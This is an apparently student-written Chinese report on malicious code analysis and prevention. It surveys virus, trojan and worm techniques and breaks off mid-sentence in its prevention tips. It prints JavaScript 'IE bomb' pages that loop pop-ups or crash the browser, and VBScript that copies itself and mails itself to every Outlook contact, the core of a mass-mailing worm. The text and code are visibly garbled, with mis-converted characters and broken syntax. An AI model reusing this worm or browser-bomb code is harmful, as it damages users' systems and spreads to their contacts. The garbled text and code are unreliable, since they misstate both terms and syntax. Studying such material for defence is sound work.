惡意代碼分析防治

惡意代碼分析與防治姓名：學(xué)號：班級：學(xué)院摘要：在Internet平安事件中，惡意代碼造成的經(jīng)濟損失占有最大的比例。惡意代碼主要包括計算機病毒〔Virus〕、蠕蟲〔Worm〕、木馬程序〔TrojanHorse〕、后門程序〔Backdoor〕、邏輯炸彈〔LogicBomb〕等等。與此同時，惡意代碼成為信息戰(zhàn)、網(wǎng)絡(luò)戰(zhàn)的重要手段。日益嚴重的惡意代碼問題，不僅使企業(yè)及用戶蒙受了巨大經(jīng)濟損失，而且使國家的平安面臨著嚴重威脅。關(guān)鍵詞：惡意代碼分析防治Abstract:EconomiclossescausedbymaliciouscodeaccountedforalargeproportioninInternetsecurityincidents.MaliciouscodemainlyincludesComputerVirus,Worm,TrojanHorse,Backdoor,LogicBombect.Meanwhile,maliciouscodebecomeimportantmeansofinformationwarfareandcyberwarfare.Maliciouscodeisagrowingproblem,whichnotonlycausescompaniesandusersgreateconomicdamage,butalsothreateninggravelynationalsecurity.Keywords:MaliciouscodeAnalysisPrevention一.惡意代碼概述惡意代碼〔UnwantedCode〕是指沒有作用卻會帶來危險的代碼，一個最平安的定義是把所有不必要的代碼都看作是惡意的，不必要代碼比惡意代碼具有更寬泛的含義，包括所有可能與某個組織平安策略相沖突的軟件。定義一：惡意代碼又稱惡意軟件。這些軟件也可稱為廣告軟件、間諜軟件、惡意共享軟件。是指在未明確提示用戶或未經(jīng)用戶許可的情況下，在用戶計算機或其他終端上安裝運行，侵犯用戶合法權(quán)益的軟件。與病毒或蠕蟲不同，這些軟件很多不是小團體或者個人秘密地編寫和散播，反而有很多知名企業(yè)和團體涉嫌此類軟件。有時也稱作流氓軟件。定義二：惡意代碼是指成心編制或設(shè)置的、對網(wǎng)絡(luò)或系統(tǒng)會產(chǎn)生威脅或潛在威脅的計算機代碼。最常見的惡意代碼有計算機病毒〔簡稱病毒〕、特洛伊木馬〔簡稱木馬〕、計算機蠕蟲〔簡稱蠕蟲〕、后門、邏輯炸彈等。惡意代碼編寫者一般利用三類手段來傳播惡意代碼：軟件漏洞、用戶本身或者兩者的混合。有些惡意代碼是自啟動的蠕蟲和嵌入腳本，本身就是軟件，這類惡意代碼對人的活動沒有要求。一些像特洛伊木馬、電子郵件蠕蟲等惡意代碼，利用受害者的心理操縱他們執(zhí)行不平安的代碼；還有一些是哄騙用戶關(guān)閉保護措施來安裝惡意代碼。利用商品軟件缺陷的惡意代碼有CodeRed、KaK和BubbleBoy。它們完全依賴商業(yè)軟件產(chǎn)品的缺陷和弱點，比方溢出漏洞和可以在不適當(dāng)?shù)沫h(huán)境中執(zhí)行任意代碼。像沒有打補丁的IIS軟件就有輸入緩沖區(qū)溢出方面的缺陷。利用Web效勞缺陷的攻擊代碼有CodeRed、Nimda，Linux和Solaris上的蠕蟲也利用了遠程計算機的缺陷。惡意代碼編寫者的一種典型手法是把惡意代碼郵件偽裝成其他惡意代碼受害者的感染報警郵件，惡意代碼受害者往往是Outlook地址簿中的用戶或者是緩沖區(qū)中WEB頁的用戶，這樣做可以最大可能的吸引受害者的注意力。一些惡意代碼的作者還表現(xiàn)了高度的心理操縱能力，LoveLetter就是一個突出的例子。一般用戶對來自陌生人的郵件附件越來越警惕，而惡意代碼的作者也設(shè)計一些誘餌吸引受害者的興趣。附件的使用正在和必將受到網(wǎng)關(guān)過濾程序的限制和阻斷，惡意代碼的編寫者也會設(shè)法繞過網(wǎng)關(guān)過濾程序的檢查。使用的手法可能包括采用模糊的文件類型，將公共的執(zhí)行文件類型壓縮成zip文件等等。惡意代碼的相關(guān)定義二.惡意代碼實現(xiàn)關(guān)鍵技術(shù)2.1.惡意代碼生存技術(shù)生存技術(shù)主要包括4方面：第一反跟蹤技術(shù)：提高自身的偽裝能力和防破譯能力，增加檢測和去除的難度,第二加密技術(shù)：自身保護,第三模糊變換技術(shù)：多態(tài)，難以進行基于特征的識別,第四自動生產(chǎn)技術(shù)：簡單實現(xiàn)惡意代碼的組合和變化2.2.惡意代碼攻擊技術(shù)2.2.1當(dāng)前操作系統(tǒng)中都有系統(tǒng)效勞和網(wǎng)絡(luò)效勞，它們都在系統(tǒng)啟動時自動加載。進程注入技術(shù)就是將這些與效勞相關(guān)的可執(zhí)行代碼作為載體，惡意代碼程序?qū)⒆陨砬度氲竭@些可執(zhí)行代碼之中，實現(xiàn)自身隱藏和啟動的目的。這種形式的惡意代碼只須安裝一次，以后就會被自動加載到可執(zhí)行文件的進程中，并且會被多個效勞加載。只有系統(tǒng)關(guān)閉時，效勞才會結(jié)束，所以惡意代碼程序在系統(tǒng)運行時始終保持激活狀態(tài)。比方惡意代碼“WinEggDropShell”可以注入Windows下的大局部效勞程序。.三線程技術(shù)在Windows操作系統(tǒng)中引入了線程的概念，一個進程可以同時擁有多個并發(fā)線程。三線程技術(shù)就是指一個惡意代碼進程同時開啟了三個線程，其中一個為主線程，負責(zé)遠程控制的工作。另外兩個輔助線程是監(jiān)視線程和守護線程，監(jiān)視線程負責(zé)檢查惡意代碼程序是否被刪除或被停止自啟動。守護線程注入其它可執(zhí)行文件內(nèi)，與惡意代碼進程同步，一旦進程被停止，它就會重新啟動該進程，并向主線程提供必要的數(shù)據(jù)，這樣就能保證惡意代碼運行的可持續(xù)性。例如，“中國黑客”等就是采用這種技術(shù)的惡意代碼。2.2.3端口復(fù)用技術(shù)，系指重復(fù)利用系統(tǒng)網(wǎng)絡(luò)翻開的端口〔如25、80、135和139等常用端口〕傳送數(shù)據(jù)，這樣既可以欺騙防火墻，又可以少開新端口。端口復(fù)用是在保證端口默認效勞正常工作的條件下復(fù)用，具有很強的欺騙性。例如，特洛伊木馬“Executor”利用80端口傳遞控制信息和數(shù)據(jù)，實現(xiàn)其遠程控制的目的。超級管理技術(shù)一些惡意代碼還具有攻擊反惡意代碼軟件的能力。為了對抗反惡意代碼軟件，惡意代碼采用超級管理技術(shù)對反惡意代碼軟件系統(tǒng)進行拒絕效勞攻擊，使反惡意代碼軟件無法正常運行。例如，“廣外女生”是一個國產(chǎn)的特洛伊木馬，它采用超級管理技術(shù)對“金山毒霸”和“天網(wǎng)防火墻”進行拒絕效勞攻擊。端口反向連接技術(shù)防火墻對于外部網(wǎng)絡(luò)進入內(nèi)部網(wǎng)絡(luò)的數(shù)據(jù)流有嚴格的訪問控制策略，但對于從內(nèi)網(wǎng)到外網(wǎng)的數(shù)據(jù)卻疏于防范。端口反向連接技術(shù)，系指令惡意代碼攻擊的效勞端〔被控制端〕主動連接客戶端〔控制端〕。國外的“Boinet”是最先實現(xiàn)這項技術(shù)的木馬程序，它可以通過ICO、IRC、和反向主動連接這4種方式聯(lián)系客戶端。國內(nèi)最早實現(xiàn)端口反向連接技術(shù)的惡意代碼是“網(wǎng)絡(luò)神偷”?！盎银澴印蹦敲词沁@項技術(shù)的集大成者，它內(nèi)置FTP、域名、效勞端主動連接這3種效勞端在線通知功能。.緩沖區(qū)溢出攻擊技術(shù)緩沖區(qū)溢出漏洞攻擊占遠程網(wǎng)絡(luò)攻擊的80％。緩沖區(qū)溢出攻擊成為惡意代碼從被動式傳播轉(zhuǎn)為主動式傳播的主要途徑。例如，“紅色代碼”利用IISServer上IndexingService的緩沖區(qū)溢出漏洞完成攻擊、傳播和破壞等惡意目的?！澳崮愤_蠕蟲”利用IIS4.0/5.0DirectoryTraversal的弱點，以及紅色代碼II所留下的后門，完成其傳播過程。惡意代碼攻擊模型三.IE炸彈攻擊IE炸彈是一種潛伏在網(wǎng)頁中的，可以通過在目標電腦上不斷彈出窗口，到達耗盡目標點電腦統(tǒng)資源的代碼病毒。常見的IE炸彈在攻擊時，主要具有死循環(huán)、自動翻開窗口、耗盡CPU等特點，下面分別介紹。3.1．死循環(huán)死循環(huán)是只在設(shè)計網(wǎng)頁時，在網(wǎng)頁中插入一段可使電腦持續(xù)運行的代碼。插入這段代碼后，網(wǎng)頁會一直運行并消耗系統(tǒng)資源，直至死機。<html><head><title>鄭思龍</title><meta-equiv="comtent-type"content="text/htmlcharset=gb2312"></head><bodtonload="windowbomb()"><scariptlanguace="javascript">functionwindowsbomb(){varicounter=0//dummycounterwhile(ture){window.open{":baidu","crashing"icounter,"width=1,height=1,resizable=no"}}}</script></body></html>在此代碼中，不難看出，導(dǎo)致代碼運行循環(huán)的語句為函數(shù)WindowsBomb()中的while(true)語句。由于它是一個條件總是為“真”的循環(huán)，在沒有被強制中斷的情況下，它會一直循環(huán)下去。在這個循環(huán)中會試圖不斷地彈出窗口，從而一直消耗系統(tǒng)資源，直至可用資源被耗盡。圖1為包含此代碼網(wǎng)頁在翻開時的系統(tǒng)提示圖1ActiveX控件運行提示圖2為運行ActiveX控件時，經(jīng)常會見到的平安警告內(nèi)容。圖2平安警告可見，所謂的“IE炸彈”，其根本就是一段使用JavaScrpt腳本語言編制的調(diào)用ActiveX控件的死循環(huán)代碼。其惡意的目的，就是要通過運行一個無限的循環(huán)來耗盡受害主機可用的系統(tǒng)資源，從而導(dǎo)致主機工作運轉(zhuǎn)的不正常。3.2．自動翻開彈窗所謂自動翻開彈窗，是指用戶在翻開包含有此代碼的網(wǎng)員后，會自動地、不斷地翻開許多新的彈出窗口。由于其翻開窗口的速度是自動進行的，通常會很快，因而很難將其一個個全部關(guān)閉。在圖3中的循環(huán)體中的語句，就是一個彈出百度搜索頁面的命令，運行它的結(jié)果，就是彈出一個百度搜索頁面。由于是在無限制的反復(fù)循環(huán)體中，這個彈出的過程會不斷地、無休止的進行下去。如下圖圖3自動翻開新窗口讓這個代碼運行下去，必然會導(dǎo)致系統(tǒng)的耗盡與崩潰。3.3IE瀏覽器崩潰IE瀏覽器崩潰的代碼設(shè)計是通過一定的特定代碼運行，導(dǎo)致IE工作失常的攻擊方式，它通常也可以使用網(wǎng)頁惡意代碼來實現(xiàn)。給出了實現(xiàn)IE瀏覽器崩潰的原代碼。<html><body><script>varcolor=newArray;color[1]="yellow";color[2]="red";for(x=0;x<3;x++){document,bgColor=color[x]if(x==2){x=0;}}</script></body></html>IE瀏覽器崩潰代碼的運行圖為包含此代碼網(wǎng)頁被翻開時，出現(xiàn)的運行確認提示圖4運行確認提示圖5給出了IE瀏覽器崩潰代碼運行后的結(jié)果四．蠕蟲病毒4.1.蠕蟲病毒的自我復(fù)制能力SetobjFs=CreateObject(“Scripting.FileSystemObject”)objFs.CreateTextFile(“C:\virus.txt”，true)如果我們把這兩句話保存成為.vbs的VB腳本文件，點擊鼠標就會在C盤中創(chuàng)立一個TXT文件了。如果我們把第二句改為：objFs.GetFile〔WScript.ScriptFullName〕.Copy(“C:\Virus.vbs”)該句前面是翻開這個腳本文件，WScript.ScriptFullName指明是這個程序本身，是一個完整的路徑文件名。GetFile函數(shù)獲得這個文件，Copy函數(shù)將這個文件復(fù)制到C盤根目錄下Virus.vbs文件。這么簡單的兩句就實現(xiàn)了自我復(fù)制的功能，已經(jīng)具備病毒的根本特征，即自我復(fù)制能力。4.2.蠕蟲病毒的傳播性例子：VB腳本代碼,foxmail不支持MAPISetobjOA=Wscript.CreateObject〔“Outlook.Application”〕SetobjMapi=objOA.GetNameSpace〔“MAPI”〕 SetobjAddList=objMapi.AddressLists〔i〕 Forj=1ToobjAddList.AddressEntries.Count SetobjMail=objOA.CreateItem〔0〕 objMail.Recipients.Add〔objAddList.AddressEntries〔j〕〕 objMail.Subject=“你好!” objMail.Body=“這次給你的附件，是我的新文檔！” objMail.Attachments.Add〔“c:\virus.vbs”〕 objMail.Send NextNext五．惡意代碼的防范方法互聯(lián)網(wǎng)上形形色色的網(wǎng)絡(luò)陷阱，讓上網(wǎng)沖浪者聞之色變，其實，只要做好周密的防范，惡意代碼又奈我何？！第一招：升級IE瀏覽版本大局部的惡意代碼只對IE5.0版本有效，而無論是Windows98還是Windows2000，初始安裝時都是低于IE5.0的版本，因此千萬不要圖一時之困，還是趕快升級吧！第二招：安裝天網(wǎng)防火墻天網(wǎng)防火墻除了有隔絕惡意網(wǎng)絡(luò)攻擊的功能外，它特有的天網(wǎng)平安檢測修復(fù)系統(tǒng)，對防范惡意代碼有特效。即使你使用的是IE5.0，用該系統(tǒng)